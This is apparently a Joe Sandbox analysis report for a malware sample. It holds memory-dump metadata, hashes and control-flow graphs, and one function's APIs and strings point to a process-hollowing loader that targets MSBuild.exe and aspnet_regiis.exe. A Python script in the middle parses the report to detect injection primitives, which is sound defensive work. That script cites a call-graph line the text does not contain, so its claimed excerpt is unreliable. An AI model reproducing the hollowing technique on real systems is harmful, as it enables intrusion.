• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: _free
• String ID: l=W
• API String ID: 269201875-560687039
• Opcode ID: a1a946c62be6859469d18d669b8c80c9ede53f2ee440bf72ee6fdeff90d88475
• Instruction ID: 0c601c0ab13e831d85b60448cff40019277d48918a2697696e41ffada7a307ec
• Opcode Fuzzy Hash: a1a946c62be6859469d18d669b8c80c9ede53f2ee440bf72ee6fdeff90d88475
• Instruction Fuzzy Hash: 46F0AF32508312AEE7112A61AC86BA73F9CFB81775F20043AF80CAB143DA61684146B5
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0054F7FC
• std::_Lockit::~_Lockit.LIBCPMT ref: 0054F857
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID: @0S
• API String ID: 593203224-2734645871
• Opcode ID: 92ad1f66b45990b0dc4a177f19bea95f850727d32a24c914be11eff3937edcad
• Instruction ID: 9aa5b1636c479fa259e31b14a45db1933e2e39df208873efa0042b2ee715a1cb
• Opcode Fuzzy Hash: 92ad1f66b45990b0dc4a177f19bea95f850727d32a24c914be11eff3937edcad
• Instruction Fuzzy Hash: 9D015E35600205AFCB05DF18C895D9DBF79FF84714B1400A9E8019F3A1EB70EE40DB90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00532078
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005320BC
  • Part of subcall function 0054F860: _Yarn.LIBCPMT ref: 0054F87F
  • Part of subcall function 0054F860: _Yarn.LIBCPMT ref: 0054F8A3
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
• String ID: bad locale name
• API String ID: 1908188788-1405518554
• Opcode ID: f5a61fb4ff17cfbd21503167dee8cf5406c31fadb32973de655b1b5712af8ade
• Instruction ID: cbd2506006c9eed543062d1c07f38f39e4a82e270a4588198cb0b9da3ad2956b
• Opcode Fuzzy Hash: f5a61fb4ff17cfbd21503167dee8cf5406c31fadb32973de655b1b5712af8ade
• Instruction Fuzzy Hash: 24F0F971101B509EE3709F7A9409783BEE4AF25714F044A2DE58AC7A42E775E508CBA5
APIs
• GetLastError.KERNEL32(0057D3B0,0000000C), ref: 00557DF2
• ExitThread.KERNEL32 ref: 00557DF9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID: @0S
• API String ID: 1611280651-2734645871
• Opcode ID: 4366152040101a8d496d82fdbcef0e3a16ffc43e8683f443535fe2688e676334
• Instruction ID: f89585854c061751ae60a34adeb57f1ea9ca491b172208d787067f5710ff901b
• Opcode Fuzzy Hash: 4366152040101a8d496d82fdbcef0e3a16ffc43e8683f443535fe2688e676334
• Instruction Fuzzy Hash: 06F0FF7190020AAFDB00AFB0C82FA2E3F74FF85712F20054AF8059B291CB706809DBA1
APIs
• Sleep.KERNEL32(00001388), ref: 0054F11B
• ___std_exception_destroy.LIBVCRUNTIME ref: 0054F132
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Sleep___std_exception_destroy
• String ID: Unknown exception
• API String ID: 2427919145-410509341
• Opcode ID: 126fa565021b36db18fc74235e512c8fe88d60c5aa849e166d87ffde372a30b4
• Instruction ID: 5d20a3f1e86636855fcda741c54bb541c3020ec65b394ad960db88e1afe9b6e3
• Opcode Fuzzy Hash: 126fa565021b36db18fc74235e512c8fe88d60c5aa849e166d87ffde372a30b4
• Instruction Fuzzy Hash: 50F089B470021157D744EB64DC6AB6E7EE5BFC8704F80009CF5499B282EA605E488B7A
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0055DD21,-00000020,00000FA0,00000000,00000000,00000000,00000000,00531C72), ref: 0055D4F8
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: @0S$InitializeCriticalSectionEx
• API String ID: 2593887523-1066972758
• Opcode ID: 9c217a5cbc0498e090ce197daa17d63f31531f4994abdca063ddef146a1ee392
• Instruction ID: cac9157a8aada71dd5d3c8994da4384d363d4152c1e8eccc1f4434efc339a5cf
• Opcode Fuzzy Hash: 9c217a5cbc0498e090ce197daa17d63f31531f4994abdca063ddef146a1ee392
• Instruction Fuzzy Hash: A8E09236141229F7DF222F41EC0AC9EBF26FB40B61B04C021FD1D162B1DBB28925F6A0
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Alloc
                                                                                                                                                                                            • String ID: @0S$FlsAlloc
                                                                                                                                                                                            • API String ID: 2773662609-2747271807
                                                                                                                                                                                            • Opcode ID: f9a7b41bdc714f6010c3359b959982d76c2a8132ed88a39159df1d2167b05e8e
                                                                                                                                                                                            • Instruction ID: 689d130f5fac978268827926f3cfe3bd5150a4a818a02af3dc2befea866caea6
                                                                                                                                                                                            • Opcode Fuzzy Hash: f9a7b41bdc714f6010c3359b959982d76c2a8132ed88a39159df1d2167b05e8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E0C2766C2A24B3C3212A95AC1AD5F7E58FBA0F72B054822FD0D522819AB14A05B1E3

Execution Graph

Execution Coverage:19.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:1.3%
Total number of Nodes:600
Total number of Limit Nodes:11
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$Memory$Write$AllocVirtual$Thread$CloseContextHandleReadWindowWow64$ConsoleCreateResumeShow
                                                                                                                                                                                            • String ID: O#$h|&$h|&$"]@9$"]@9$${4$${4$&HLW$'%;$$,,hK$,>O$-Fd0$-Fd0$4EP$4Sq[$5xCP$9"S\$@$@Za_$@Za_$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$G\bn$K>H$Y')L$^$iE$bm9R$g>=$jV%j$kernel32.dll$m4e$ntdll.dll$nex$oF.5$sHa=$u^K$w*h0$}FF$}^2&$}\:$#b$2n$:kQ$<9.$r^l$r^l$zjm$zjm
                                                                                                                                                                                            • API String ID: 284040131-2197671511
                                                                                                                                                                                            • Opcode ID: 95b671818ef8acfe0fd623e850c266b0b93884f68d03a5837dbd46a8038d40f5
                                                                                                                                                                                            • Instruction ID: 08528facda73ab212e0b36ba9ad94fb1af38fdaf0d83c2c0265de80a2907d77d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 95b671818ef8acfe0fd623e850c266b0b93884f68d03a5837dbd46a8038d40f5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 18341232A422158FCF24CE3CCA953DD77F1AB47354F1052B9E91DABAA4C6359AC98F01
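The edge list above is Joe Sandbox's text rendering of this function's call graph: each node is a decimal id, a hex address, and the API names called from that block; every `A->B` token is an edge. The API ID summary (Process / Memory / Write / AllocVirtual / Thread / Context / Wow64 / Resume) and the MSBuild.exe and aspnet_regiis.exe paths in the String ID list are the shape of a RunPE-style hollowing loader, but reading that out of a single 2,000-token line by hand is error-prone. The following is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses the dump, reports which process-injection primitives the graph references, lists the APIs reachable from a chosen node, and pulls the candidate hollowing targets out of the String ID line. The graph excerpt is copied from the line above (its first node definition is cut off by the page's line break, so the parser keeps those leading names under a `None` key); the primitive list, the hollowing heuristic and the shortened string list are the editor's assumptions.

```python
"""Added example (not part of the Joe Sandbox report): parse the plain-text
call-graph dump above and pull out the process-injection primitives it
references.  INJECTION_PRIMITIVES and looks_like_hollowing() are the editor's
own assumptions about what a RunPE loader needs, not something the report states."""
import re
from collections import defaultdict

# Constructed excerpt, copied from the report's call-graph text for the module at
# 0x6C770000.  The first node's id/address is cut off by the page's line break,
# so its API names precede any node definition.
CALL_GRAPH_EXCERPT = (
    "Wow64SetThreadContext ResumeThread 14773->14774 14775 6c77c6d5 14773->14775 "
    "14774->14760 14775->14760 14776 6c785d81 ReadProcessMemory 14775->14776 "
    "14777 6c77c8a3 14775->14777 14776->14760 14777->14760 14803 6c7787a0 14777->14803 "
    "14806 6c7787bf __CreateFrameInfo 14803->14806 "
    "14804 6c778da2 GetModuleHandleW GetProcAddress 14804->14806 "
    "14805 6c7789a4 GetModuleHandleW GetProcAddress 14805->14806 14806->14804 14806->14805 "
    "14807 6c778a6b NtQueryInformationProcess 14806->14807 14808 6c778d88 14806->14808 "
    "14807->14806 14809 6c787c70 _ValidateLocalCookies 5 API calls 14808->14809 "
    "14810 6c778d98 VirtualAllocEx 14809->14810 14810->14760"
)

# Shortened (constructed) copy of the same function's '$'-separated "String ID" line.
STRING_ID_LINE = (
    "O#$h|&$kernel32.dll$C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
    "$C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_regiis.exe$ntdll.dll$nex"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
# Joe Sandbox prints a hex address (6c778d98) or a basic-block range (17b0ef8-17b0f0e).
ADDRESS = re.compile(r"^[0-9a-f]{6,8}(-[0-9a-f]{6,8})?$")
# Win32/Nt export names are CamelCase; this skips CRT helpers (_ValidateLocalCookies)
# and summary words such as "5 API calls".
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")

# Assumption: the RunPE / process-hollowing primitives worth flagging.
INJECTION_PRIMITIVES = {
    "NtQueryInformationProcess", "ReadProcessMemory", "NtUnmapViewOfSection",
    "VirtualAllocEx", "WriteProcessMemory", "SetThreadContext",
    "Wow64SetThreadContext", "ResumeThread", "NtResumeThread",
}


def parse_graph(text):
    """Return ({node_id: (address, [label tokens])}, [(src, dst)]).

    A node definition is a decimal id immediately followed by an address token;
    every token up to the next definition or edge belongs to that node's label.
    Tokens seen before any definition (a node cut off by the excerpt) go under None.
    """
    tokens = text.split()
    nodes = {None: (None, [])}
    edges = []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDRESS.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (tokens[i + 1], [])
            i += 2
        else:
            nodes[current][1].append(tok)
            i += 1
    return nodes, edges


def referenced_apis(nodes):
    """Sorted set of API-looking label tokens across all nodes."""
    return sorted({t for _, label in nodes.values() for t in label if API_NAME.match(t)})


def injection_primitives(nodes):
    return sorted(set(referenced_apis(nodes)) & INJECTION_PRIMITIVES)


def looks_like_hollowing(nodes):
    """Heuristic: remote allocate/write, rewrite a thread context, then resume."""
    found = set(injection_primitives(nodes))
    return (bool(found & {"VirtualAllocEx", "WriteProcessMemory"})
            and bool(found & {"SetThreadContext", "Wow64SetThreadContext"})
            and bool(found & {"ResumeThread", "NtResumeThread"}))


def apis_reachable_from(nodes, edges, root):
    """API names on nodes reachable from `root`, in depth-first order."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, out, stack = set(), [], [root]
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        out.extend(t for t in nodes.get(node, (None, []))[1] if API_NAME.match(t))
        stack.extend(reversed(succ[node]))  # keep the report's edge order
    return out


def hollowing_targets(string_id_line):
    """Executable paths embedded in the function's string list."""
    return re.findall(r"[A-Za-z]:\\[^$]+\.exe", string_id_line)


if __name__ == "__main__":
    g_nodes, g_edges = parse_graph(CALL_GRAPH_EXCERPT)
    print("primitives:", injection_primitives(g_nodes))
    print("hollowing :", looks_like_hollowing(g_nodes))
    print("from 14803:", apis_reachable_from(g_nodes, g_edges, 14803))
    print("targets   :", hollowing_targets(STRING_ID_LINE))
```

The same parser handles the `control_flow_graph` dumps further down, whose nodes carry basic-block ranges (`17b0ef8-17b0f0e`) and `call <addr>` tokens instead of API names; only the label interpretation changes. Because the dump is a graph rather than a trace, the heuristic checks which primitives are present, not their order: `ReadProcessMemory` on node 14776 is reachable only after the `Wow64SetThreadContext`/`ResumeThread` block, so an order-sensitive check would miss this loader.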
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$File$ModuleProtectVirtual$Create$ChangeCurrentFindInformationMappingNameNotificationProcessView
                                                                                                                                                                                            • String ID: `It$,Vh$,Vh$@$Ag$C*D$Ere<$Ere<$F(O($P/jU$Qg`~$ihc>$r$c$r$c$ud'I$xl$y+=$y+=$|RD$xi$
                                                                                                                                                                                            • API String ID: 3322835611-3725121427
                                                                                                                                                                                            • Opcode ID: ec2f3f451fc7971540879a5b43deacb91e63ededa1bd68646aa6713bcf62a866
                                                                                                                                                                                            • Instruction ID: 42e49345f6b8e1f0790dd28b6266cb1631a71a63e928784a3565ed18b71fba5b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ec2f3f451fc7971540879a5b43deacb91e63ededa1bd68646aa6713bcf62a866
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DC32435A40209CFCF24CE7CCA953D977F2AB43315F10866AD819EBBA1C73999899F50

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            control_flow_graph 3622 17b0ef8-17b0f0e 3623 17b0f11-17b0f12 3622->3623 3624 17b0f10 3622->3624 3626 17b0f15-17b0f1a 3623->3626 3627 17b0f14 3623->3627 3624->3623 3625 17b0f1b-17b0f1c 3624->3625 3628 17b0f1d-17b0f1e 3625->3628 3626->3625 3626->3628 3627->3626 3629 17b0f21-17b0f24 3628->3629 3630 17b0f20 3628->3630 3631 17b0f30-17b0f32 3629->3631 3632 17b0f26 3629->3632 3630->3629 3635 17b0f35-17b0f36 3631->3635 3636 17b0f34 3631->3636 3633 17b0f29-17b0f2f 3632->3633 3634 17b0f27-17b0f28 3632->3634 3633->3631 3634->3633 3637 17b0f39-17b0f3a 3635->3637 3638 17b0f38 3635->3638 3636->3635 3640 17b0f3b-17b0f3c 3637->3640 3641 17b0f3d-17b0f3e 3637->3641 3638->3637 3639 17b0f46 3638->3639 3644 17b0f49-17b0f4d 3639->3644 3645 17b0f48 3639->3645 3640->3641 3642 17b0f3f-17b0f40 3641->3642 3643 17b0f41-17b0f42 3641->3643 3642->3643 3646 17b0f4f-17b0f52 3642->3646 3647 17b0f45 3643->3647 3648 17b0f44 3643->3648 3644->3646 3645->3644 3649 17b0f55-17b0f72 3646->3649 3650 17b0f54 3646->3650 3647->3639 3648->3647 3652 17b0f75-17b0f7a 3649->3652 3653 17b0f74 3649->3653 3650->3649 3654 17b0f7d-17b0f7e 3652->3654 3655 17b0f7c 3652->3655 3653->3652 3656 17b0f81-17b0fc5 call 17b00e4 3654->3656 3657 17b0f80 3654->3657 3655->3654 3660 17b0fca 3656->3660 3657->3656 3661 17b0fcf-17b0fe4 3660->3661 3662 17b0fea 3661->3662 3663 17b1103-17b114c call 17b00f4 3661->3663 3662->3660 3662->3663 3664 17b1059-17b106b 3662->3664 3665 17b1093-17b10b0 3662->3665 3666 17b10f3-17b10fe 3662->3666 3667 17b1012-17b1016 3662->3667 3668 17b0ff1-17b0ffd 3662->3668 3669 17b1070-17b108e 3662->3669 3670 17b10d6-17b10db 3662->3670 3671 17b1026-17b1054 3662->3671 3672 17b10b5-17b10d1 3662->3672 3689 17b114e call 17b1eab 3663->3689 3690 17b114e call 17b1bc9 3663->3690 3691 17b114e call 17b1bb9 3663->3691 3692 17b114e call 17b212e 
3663->3692 3693 17b114e call 17b228d 3663->3693 3694 17b114e call 17b1afd 3663->3694 3695 17b114e call 17b1b6c 3663->3695 3696 17b114e call 17b1aa1 3663->3696 3697 17b114e call 17b1b50 3663->3697 3698 17b114e call 17b1b10 3663->3698 3699 17b114e call 17b1b27 3663->3699 3700 17b114e call 17b1b97 3663->3700 3664->3661 3665->3661 3666->3661 3673 17b1018-17b101d 3667->3673 3674 17b101f 3667->3674 3685 17b1005-17b1010 3668->3685 3669->3661 3678 17b10e3-17b10ee 3670->3678 3671->3661 3672->3661 3677 17b1024 3673->3677 3674->3677 3677->3661 3678->3661 3685->3661 3688 17b1154-17b115d 3689->3688 3690->3688 3691->3688 3692->3688 3693->3688 3694->3688 3695->3688 3696->3688 3697->3688 3698->3688 3699->3688 3700->3688
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Tefq$Tefq
                                                                                                                                                                                            • API String ID: 0-1395890369
                                                                                                                                                                                            • Opcode ID: 56468eb93a435ddac1ca9cf912716419aa86a1ee337acf1ba413d1ee8f3d0332
                                                                                                                                                                                            • Instruction ID: 56d2017d04a1036f0a7847b7fc284d82061f2d19de94b991966e467aa19d408b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56468eb93a435ddac1ca9cf912716419aa86a1ee337acf1ba413d1ee8f3d0332
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E71D171B042158FCB4A9F68C8D57EFFBB2FF85300B1584AAE405AF266D7319A01CB91

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            control_flow_graph 3701 17b0f98-17b0fc5 call 17b00e4 3704 17b0fca 3701->3704 3705 17b0fcf-17b0fe4 3704->3705 3706 17b0fea 3705->3706 3707 17b1103-17b114c call 17b00f4 3705->3707 3706->3704 3706->3707 3708 17b1059-17b106b 3706->3708 3709 17b1093-17b10b0 3706->3709 3710 17b10f3-17b10fe 3706->3710 3711 17b1012-17b1016 3706->3711 3712 17b0ff1-17b0ffd 3706->3712 3713 17b1070-17b108e 3706->3713 3714 17b10d6-17b10db 3706->3714 3715 17b1026-17b1054 3706->3715 3716 17b10b5-17b10d1 3706->3716 3733 17b114e call 17b1eab 3707->3733 3734 17b114e call 17b1bc9 3707->3734 3735 17b114e call 17b1bb9 3707->3735 3736 17b114e call 17b212e 3707->3736 3737 17b114e call 17b228d 3707->3737 3738 17b114e call 17b1afd 3707->3738 3739 17b114e call 17b1b6c 3707->3739 3740 17b114e call 17b1aa1 3707->3740 3741 17b114e call 17b1b50 3707->3741 3742 17b114e call 17b1b10 3707->3742 3743 17b114e call 17b1b27 3707->3743 3744 17b114e call 17b1b97 3707->3744 3708->3705 3709->3705 3710->3705 3717 17b1018-17b101d 3711->3717 3718 17b101f 3711->3718 3729 17b1005-17b1010 3712->3729 3713->3705 3722 17b10e3-17b10ee 3714->3722 3715->3705 3716->3705 3721 17b1024 3717->3721 3718->3721 3721->3705 3722->3705 3729->3705 3732 17b1154-17b115d 3733->3732 3734->3732 3735->3732 3736->3732 3737->3732 3738->3732 3739->3732 3740->3732 3741->3732 3742->3732 3743->3732 3744->3732
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Tefq$Tefq
                                                                                                                                                                                            • API String ID: 0-1395890369
                                                                                                                                                                                            • Opcode ID: a51add261e2416566a898d0709b043162b3d1c3f7035e443cf8da1db47e540b0
                                                                                                                                                                                            • Instruction ID: aa0f73e94ea791de7d146ed055ce904a0f970c92793969c770ece53e58f5275b
                                                                                                                                                                                            • Opcode Fuzzy Hash: a51add261e2416566a898d0709b043162b3d1c3f7035e443cf8da1db47e540b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: FD41A031B101198FCB149B69C9956AFFBF7FB88301F11856AE506EB3A4CB319E058B91

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            control_flow_graph 3483 6c787dd8-6c787deb call 6c788630 3486 6c787ded-6c787def 3483->3486 3487 6c787df1-6c787e13 call 6c788220 3483->3487 3489 6c787e5a-6c787e69 3486->3489 3491 6c787e80-6c787e99 call 6c7884ba call 6c788630 3487->3491 3492 6c787e15-6c787e58 call 6c7882eb call 6c7881a7 call 6c788603 call 6c787e6d call 6c78848c call 6c787e7a 3487->3492 3503 6c787eaa-6c787eb1 3491->3503 3504 6c787e9b-6c787ea1 3491->3504 3492->3489 3507 6c787ebd-6c787ed1 dllmain_raw 3503->3507 3508 6c787eb3-6c787eb6 3503->3508 3504->3503 3506 6c787ea3-6c787ea5 3504->3506 3510 6c787f83-6c787f92 3506->3510 3513 6c787f7a-6c787f81 3507->3513 3514 6c787ed7-6c787ee8 dllmain_crt_dispatch 3507->3514 3508->3507 3511 6c787eb8-6c787ebb 3508->3511 3515 6c787eee-6c787f00 call 6c787380 3511->3515 3513->3510 3514->3513 3514->3515 3521 6c787f29-6c787f2b 3515->3521 3522 6c787f02-6c787f04 3515->3522 3525 6c787f2d-6c787f30 3521->3525 3526 6c787f32-6c787f43 dllmain_crt_dispatch 3521->3526 3522->3521 3524 6c787f06-6c787f24 call 6c787380 call 6c787dd8 dllmain_raw 3522->3524 3524->3521 3525->3513 3525->3526 3526->3513 3528 6c787f45-6c787f77 dllmain_raw 3526->3528 3528->3513
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __RTC_Initialize.LIBCMT ref: 6C787E1F
                                                                                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6C787E39
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2442719207-0
                                                                                                                                                                                            • Opcode ID: fe5fe32ff381cb7fef8f326e544e4c834207d601a7697e59c3ceb6430ae512da
                                                                                                                                                                                            • Instruction ID: 3f5914126b08f71187cac84c84a97ee02950b38fe6acbe583f63d808d2ed52bc
                                                                                                                                                                                            • Opcode Fuzzy Hash: fe5fe32ff381cb7fef8f326e544e4c834207d601a7697e59c3ceb6430ae512da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1241E932F07215ABDB208F99CA48B9E7B75EB40798F114136FA1667B50D7304D45DBA0

                                                                                                                                                                                            Control-flow Graph

